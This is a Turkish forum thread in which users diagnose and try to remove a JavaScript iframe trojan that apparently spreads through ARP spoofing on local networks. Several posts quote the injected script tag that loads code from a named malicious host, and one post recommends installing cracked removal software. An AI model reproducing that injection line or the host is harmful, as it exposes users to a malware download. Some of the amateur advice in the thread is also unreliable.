JS/TrojanDownloader.Iframe.NAL ( Silinemeyen trojan problemi )

[nsgnc]

mesajın]

Kendi tecrübe ettiğim şeyleri yazdım sadece. Fazla teknik ayrıntı yok:
http://forum.shiftdelete.net/index.php/topic,37929.msg359169.html#msg359169

Bazı şeyleri teknik olduğu için yazmadım, zaten sistem mühendisi olmadığım için virüsü simüle edip ona göre yazmam da söz konusu değildi.

MBR'a bulaştığı da yaygın görüş, kanıt var mı bilmiyorum, sadece JS ile yazılmış olması MBR'a bulaşmayacağını göstermez, ancak şu anda yazılımcıların genel görüşü bu. Ben de oturup virüslü bir bilgisayarda MBR okumakla uğraşmadığım için sadece görüş aktardım doğrusu.

teşekkürler

 

[erhan78]

gerçekten işe yarıyor çok sağolun

 

[nsgnc]

gerçekten işe yarıyor çok sağolun

ben daha hepsini deneyemedim. hangisi işe yarıyor

 

[Turab Garip]

gerçekten işe yarıyor çok sağolun

ben daha hepsini deneyemedim. hangisi işe yarıyor

AntiARP. Ancak daha önce ifade ettiğim gibi, virüsü temizlemiyor, sadece giriş-çıkış yapmasını engelliyor.

 

[nsgnc]

AntiARP ı kurdum. ağdaki başka bir bilgisayardan gelen paketleri engelliyor şu anda. bu engellemeyi nod32 de yapabiliyor zaten. Çözüm bulursam(silmek) burada paylaşacağım.

 

[nsgnc]

Google arama sonuçları zenginleşmiş bu arada.

 

[XiLoNeN]

ewt arkadaşlar kesinlikle antiARP ile en azından virüsün işlevini engelleyebiliyorsunuz

orginal sitesi: http://www.antiarp.com/English/e_index.htm

 

[yashale]

Bahsetmiş olduğum virüs sorunu çözüldü arkadaşlar, virüs dediğim gibi internetten geliyordu. İnternete girmediğin sürece sorun yoktu. Bu arada pc ağa bağlı, ağda sadece bir bilgisayar temiz görünüyordu ve yoğun çabalar sonucu virüs görünmeyen pc de olduğu anlaşıldı ve o pc de nod32 kurulu idi hiçbir işe yaramadı.

 

[nsgnc]

Bahsetmiş olduğum virüs sorunu çözüldü arkadaşlar, virüs dediğim gibi internetten geliyordu. İnternete girmediğin sürece sorun yoktu. Bu arada pc ağa bağlı, ağda sadece bir bilgisayar temiz görünüyordu ve yoğun çabalar sonucu virüs görünmeyen pc de olduğu anlaşıldı ve o pc de nod32 kurulu idi hiçbir işe yaramadı.

Tam olarak nasıl çözdün biraz açar mısın?

 

[murteza]

KIS 7 veya NORTON ANTIBOT
Bende herikiside kurulu çok etkili
Tavsiye ederim

 

[nsgnc]

KIS 7 veya NORTON ANTIBOT
Bende herikiside kurulu çok etkili
Tavsiye ederim

teşekkürler

 

[murteza]

KIS 7 veya NORTON ANTIBOT
Bende herikiside kurulu çok etkili
Tavsiye ederim

teşekkürler

Görev yöneticisinden şüpheli programların çalışmasını durdur.
Temizlik yapmadan önce internet bağlantısını mutlaka kes
Önce Porgram ekle kaldırdan gözüken şüpheli yazılımları kaldır.
Olmazsa Uninstaller programları kullanabilirsin. Onlar rahat kaldırırlar
Ardından etkili Antivirus ile tarat
Anti spyware yazılımları ile de tarama yap
Regestry temizlik programları da kullanabilirsin
Bunlarda olmasa sürücüdeki dosyaları yedekle ve Format...
Tabi bunları çoğunu uzman biri yapabilir.
Sistemini ve güvenlik yazılımlarını güncel tutmalısın

 

[yashale]

Bahsetmiş olduğum virüs sorunu çözüldü arkadaşlar, virüs dediğim gibi internetten geliyordu. İnternete girmediğin sürece sorun yoktu. Bu arada pc ağa bağlı, ağda sadece bir bilgisayar temiz görünüyordu ve yoğun çabalar sonucu virüs görünmeyen pc de olduğu anlaşıldı ve o pc de nod32 kurulu idi hiçbir işe yaramadı.

Tam olarak nasıl çözdün biraz açar mısın?

Sorun tam olarak çözülmedi aslında virüsü yayan pc bilgi işleme gönderildi. Ama gelince öğrenirim nasıl olduğunu.

 

[nsgnc]

Bahsetmiş olduğum virüs sorunu çözüldü arkadaşlar, virüs dediğim gibi internetten geliyordu. İnternete girmediğin sürece sorun yoktu. Bu arada pc ağa bağlı, ağda sadece bir bilgisayar temiz görünüyordu ve yoğun çabalar sonucu virüs görünmeyen pc de olduğu anlaşıldı ve o pc de nod32 kurulu idi hiçbir işe yaramadı.

Çözümü öğrenebildiniz mi acaba??
Tam olarak nasıl çözdün biraz açar mısın?

Sorun tam olarak çözülmedi aslında virüsü yayan pc bilgi işleme gönderildi. Ama gelince öğrenirim nasıl olduğunu.

 

[Yavzas]

Bu Virüs 1 haftadır bütün çalışma düzenimi mahvetti resmen piskolojim bozuldu. Format felan çözüm değil arkadaşlar, Aldığım Ghost un haddi hesabı olmadı. Virüs ağdan yayılıyor doğru önemli olan hangi PC den yayılıyor bunu bulmak, Sanırım ağda bulaşan bir PC tarafından Modeme ya da Swich e yazılıyor ve Girilen her sayfa da " <script language="javascript" SRC="h**p://mx.content-type.cn:443/day.js"></script> (Tıklamayın)" kodunu sayfa başına ekliyor. ve diğer PC(ler) gibi sizide köle yapmaya çalışıyor. Bunu algılayan Kaspersky bişi yapamıyor çünkü virüs başka bir server da ve silinmiyor. Sadece çalıştırmanızı engelliyor.

Modeme reset atıldığında Virüs gidiyor ama ağdaki başka bir PC yeniden modeme ya da Swich e yeniden yazıyor.. ve sayfa başına yeniden geliyor. Çok ama çok sinir bozucu bir durum kurtuluş yok sanırım. Ya da ağdaki tüm PC leri adam gibi Kaspersky ya da Antivir ile tarattırmak. Çok dahice bir virüs yazanın bütün gün hatrını soruyorum. (Sanırım çinli) . Ağdan yayıldığını nerden çıkardım? çünkü bütün PC leri kapatınca virüs felan ortada görünmüyor ama ağdaki PC ler açılınca o kod tekrar yerleşiyor sayfa başına... , Not Modemi Firmware güncellemesini yaptım, fabrika ayarlarına aldım çözüm olmadı... Sniffer ile yayıldığını söyleyebilirim.

Kesin kurtuluş yöntemini bulduğumda paylaşacağım tekrar.. AntiARP geçici bir çözüm dooru ama tedavi değil sadece ağrı kesici...

Boğuşan arkadaşlara geçmiş olsun dileklerimi iletiyorum. ve Format atmayın boşuna boşuna eğer Antivir ya da Kaspersky kullanıyorsanız..

 

[nsgnc]

Bu Virüs 1 haftadır bütün çalışma düzenimi mahvetti resmen piskolojim bozuldu. Format felan çözüm değil arkadaşlar, Aldığım Ghost un haddi hesabı olmadı. Virüs ağdan yayılıyor doğru önemli olan hangi PC den yayılıyor bunu bulmak, Sanırım ağda bulaşan bir PC tarafından Modeme ya da Swich e yazılıyor ve Girilen hey sayfa da " <script language="javascript" SRC="h**p://mx.content-type.cn:443/day.js"></script> (Tıklamayın)" kodunu sayfa başına ekliyor. ve diğer PC(ler) gibi sizide köle yapmaya çalışıyor. Bunu algılayan Kaspersky bişi yapamıyor çünkü virüs başka bir server da ve silinmiyor. Sadece çalıştırmanızı engelliyor.

Modeme reset atıldığında Virüs gidiyor ama ağdaki başka bir PC yeniden modeme ya da Swich e yeniden yazıyor.. ve sayfa başına yeniden geliyor. Çok ama çok sinir bozucu bir durum kurtuluş yok sanırım. Ya da ağdaki tüm PC leri adam gibi Kaspersky ya da Antivir ile tarattırmak. Çok dahice bir virüs yazanın bütün gün hatrını soruyorum. (Sanırım çinli) . Ağdan yayıldığını nerden çıkardım? çünkü bütün PC leri kapatınca virüs felan ortada görünmüyor ama ağdaki PC ler açılınca o kod tekrar yerleşiyor sayfa başına... , Not Modemi Firmware güncellemesini yaptım, fabrika ayarlarına aldım çözüm olmadı... Spoofing ile yayıldığını söyleyebilirim.

Kesin kurtuluş yöntemini bulduğumda paylaşacağım tekrar.. AntiARP geçici bir çözüm dooru ama tedavi değil sadece ağrı kesici...

Bulaşan arkadaşlara geçmiş olsun dileklerimi iletiyorum. ve Format atamayın boşuna boşuna eğer Antivir ya da KasperSky kullanıyorsanız..

virüs hakkında ki düşüncelerimi aktarayım. ağda virüs bakımından sorunlu bir pc var şu anda. AntiARP'tan edindiğim izlenime göre bu pc kendini modem yada ağgeçiti (veya herneyse işte) olarak tanıtıyor. o pc den gelen paketler bizim bilgisayarımızda problem çıkarıyor.
Ağda 3 bilgisayar var.

PC1: Benim pc. sorun yok. gelen paketleri engelledim.

PC2: Ciddi derecede sorunlu birden fazla sayıda virüs var. Bu pc kapatılınca ağda sorun kalmıyor.

PC3: Kısmen sorunlu. NOD32 virüs buldu: (Win32\Alman.NAB) temizlendi.

ben birazdan PC2 ye format atacağım.

 

[Turab Garip]

Arkadaşlar ben 20 makineyi kurtardım bu virüsten, daha önce anlattığım gibi, Microsoft Remote Data Access (MDAC - RDS) isimli eklentiki bir açıktan faydalanarak sisteme yerleşiyor. Format attıktan sonra mutlaka SP3 ve SP3'ten sonra çıkan güncelleştirmeleri yükleyin. (Listesini daha önce bu bölümde verdim.) Ondan sonra da IE'de çıkan RSA eklentisini kesinlikle yüklemeyin virüs bulaşamayacaktır. Yüklerseniz de devre dışı bırakın, bu sayede girmesini engellemiş olursunuz.

 

[Yavzas]

Virüs ten kurtuldum (&amp .. SP3 felan hikaye... Çünkü ağda bir bilgisayara bulaşıyor ve sürekli paket gönderiyor. AntiARP ile hangi IP(ler) den paket geldiğini tespit edin ve temizleyin, formatlayın. Tabiiki bir antivirüs programı yoksa size ya da ağdaki diğer bilgisayarlara bulaşmış olma ihtimali çok yüksek. :*

 

[Turab Garip]

Yavzas, yarın bir gün bir daha bulaşır. Microsoft'un açıklamasına mı inanalım şimdi buna mı? Bir açıktan faydalanarak bulaşıyor virüs, SP3 ve sonradanda çıkan bir kaç yama bu virüsün faydalandığı açığı kapatıyor.

AntiARP ile nereden saldırı geldiğini bulup temizleyebilirsin, ki ben de öyle yapmıştım, ama 20 tane bilgisayara yeniden bulaştı.

Bu virüsün en önemli özelliği DOS saldırıları için bilgisayarı kullanıyor olması, dolayısıyla IP adresin sabitse (ki internet kafelerin genelde sabit), o zaman yeniden bulaşma ihtimali de yüksek.

 

[adorax]

TEŞEKKÜR EDERİZ YARARLI OLDU

ADORA BİLGİSAYAR - Bilgisayar,dizst,masast,donanım,yazılım,elektronik..Bir dnya teknoloji..Web hizmetleri,Şirketler servis ve bakım hizmetleri,TTNet Adsl zm ortaklığı..

 

[eren_alp]

benim pc ye de bulaştı . nod32 kurulu her site açışımda karşıma uyarı geliyor.
yukarda yazılanlardan hangisi kesin çözüm gibi.

uyarı ayrıntıları

dosya:
http//ads.vk987.info/index.htm

virüs:
JS/TrojanDownloader.Iframe.NBM truva atı

 

[_megavisor_]

spybot kur silmeyi dene bence arkadaşım....

 

[EVREKA]

Kullanımı oldukça kolay ve çok hızlı bir program.Trojan ve Rootkits leri yakalıyor ve yokediyor.Programı kurduktan sonra crack dosyasından çıkanları C - Program Files - UnHackMe içine yapıştırın ve full sürüme çevirin.Programı açıp check butonuna basın ve eğer trojan yada rootkits bulursa stop a basın ve temizleyin (
Download ( 3.4 mb ) :

..............................

Chimera Not : Download linki silinmiştir. Forum üzerinde crackli paylaşımlar yapmak yasaktır.

 

[tertunc]

Kullanımı oldukça kolay ve çok hızlı bir program.Trojan ve Rootkits leri yakalıyor ve yokediyor.Programı kurduktan sonra crack dosyasından çıkanları C - Program Files - UnHackMe içine yapıştırın ve full sürüme çevirin.Programı açıp check butonuna basın ve eğer trojan yada rootkits bulursa stop a basın ve temizleyin (
Download ( 3.4 mb ) :

Crack vermek site kurallarına aykırıdır.

 

[KintaRo]

127.0.0.1 localhost
127.0.0.1 http//ads.vk987.info/index.htm

C:\Windows\system32\drivers\etc\hosts dosyasının içeriğini bu şekilde yaparsan en azından gelen o tek dosyanın önünü kesebilirsin ayrıca http://forum.shiftdelete.net/guvenl...-cikti-cikmaya-devam-ediyor-2.html#post377430 şuraya bi bakmanı tavsiye ederim.

 

[eren_alp]

hosts dosyasına kadar geldim ama o dosya açılmıyor ki nasıl yapacağım

anlatırmısınız lütfen

 

[bulentb]

Ya allah aşkına bilende konuşuyor bilmeyende bilgisayar bilgisi olanda yazıyor olmayanda yok şunu indir yok bunu dene önce virüsü senden kesin sil ondan sonra sende tamam şimdi buldum de. Ilk defa mesaj yazıyorum çünkü o kadar iyi bilgisayarcı olmama rağemen çözümü bulamadım bir bulsam paylaşacam yok flash son sürüm yok av yok host yok deepfreze yeter yav yazmayın milletinde kafasını karıştırmayın. Kesin çözümü ise paylaşın arkadaşlarım. Iyi çalışamlar

 

[KintaRo]

hosts dosyasına kadar geldim ama o dosya açılmıyor ki nasıl yapacağım

anlatırmısınız lütfen

Üzerine çift tıkladığında açılan pencereden Not Defterini seçip aç diyeceksiniz.

 

[dego23]

Çok Önemli Webroot Spy programı hemen siliyor süper yemin ederim

http://www.webroot.com/En_US/consumer-downloads.html